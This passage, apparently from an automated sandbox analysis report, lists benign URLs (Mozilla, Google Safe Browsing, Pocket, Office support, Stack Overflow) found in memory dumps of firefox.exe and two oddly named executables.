Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://oauth.accounts.firefox.com/v1
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ok.ru/
Source: firefox.exe, 0000001C.00000002.3056833390.000001DEEC939000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2721477258.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2839862901.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
Source: firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.hbomax.com/page/
Source: firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.hbomax.com/player/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2721477258.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2839862901.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA32D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sx
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://prod.ohttp-gateway.prod.webservices.mozgcp.net/ohttp-configs
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://profile.accounts.firefox.com/v1
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://profiler.firefox.com
Source: firefox.exe, 0000001C.00000003.2884308105.000001DEFA2E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://push.services.mozilla.com
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/api/v1/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/diagnostic?site=
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&p
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=%GOOGLE_SAFEBR
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatHits?$ct=application/x-protobuf&key=%GOOGLE_SAFEBROWSIN
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSy
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
Source: firefox.exe, 0000001C.00000002.3057721005.000001DEECA42000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/value=label
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.comremoveTabsProgressListenerpictureinpicture.settingsaccount-connection
Source: firefox.exe, 0000001C.00000003.2933112137.000001DEF03B7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2779540484.000001DEF03BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://searchfox.org/mozilla-central/source/toolkit/components/search/SearchUtils.jsm#145-152
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/abuse/report/addon/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=navclient-auto-ffox&appver=118.0&pver=2.2UPDATE
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/facebook.svgresource://gre/modules/TelemetryStorage.sys.mjs
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%L
Source: firefox.exe, 0000001C.00000003.2900139173.000001DEF6967000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2891825991.000001DEF7090000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com
Source: firefox.exe, 0000001F.00000002.2955222099.000001D14E812000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2957984264.000001729E713000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 0000001C.00000003.2900139173.000001DEF6967000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs#
Source: firefox.exe, 0000001C.00000003.2895155915.000001DEF69D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs#l
Source: firefox.exe, 0000001C.00000003.2903058147.000001DEF24B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2910065957.000001DEF1F87000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2967932562.000001D14F003000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2957984264.000001729E7F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/user
Source: SxQyhJr.exe, 00000007.00000002.2452626823.0000000006300000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: SxQyhJr.exe, 00000007.00000002.2431381161.0000000003059000.00000004.00000800.00020000.00000000.sdmp, SxQyhJr.exe, 00000007.00000002.2452626823.0000000006300000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: SxQyhJr.exe, 00000007.00000002.2452626823.0000000006300000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-jsresource://gre/modules/TelemetryTimestamps.sys.mjs
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: a6f0d09f38.exe, 0000000D.00000003.2574632823.0000000005BE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.microsof
Source: firefox.exe, 0000001C.00000002.3057721005.000001DEECA42000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/search-engine-removal
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=panel-def
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=spotlight
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report
Source: firefox.exe, 0000001C.00000003.2890160247.000001DEF9DEB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADAA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: firefox.exe, 0000001C.00000003.2888648124.000001DEFA2BB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 0000001C.00000003.2824146264.000001DEF14A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings
Source: firefox.exe, 0000001C.00000003.2919395940.000001DEF137F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings2
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/website-translation
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/website-translationFTP
Source: a6f0d09f38.exe, 0000000D.00000003.2630491098.0000000005C9F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: firefox.exe, 0000001C.00000003.2888648124.000001DEFA2BB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: a6f0d09f38.exe, 0000000D.00000003.2574632823.0000000005BDF000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2574711304.0000000005BD8000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2601644924.0000000005BD8000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2602125787.0000000005BD8000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2601840702.0000000005BD8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: a6f0d09f38.exe, 0000000D.00000003.2574711304.0000000005BB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: a6f0d09f38.exe, 0000000D.00000003.2574632823.0000000005BDF000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2574711304.0000000005BD8000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2601644924.0000000005BD8000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2602125787.0000000005BD8000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2601840702.0000000005BD8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: a6f0d09f38.exe, 0000000D.00000003.2574711304.0000000005BB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: firefox.exe, 0000001C.00000003.2758502866.000001DEF6A39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755113615.000001DEF69B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756128256.000001DEF6A35000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tc39.github.io/ecma262/#sec-typeof-operator
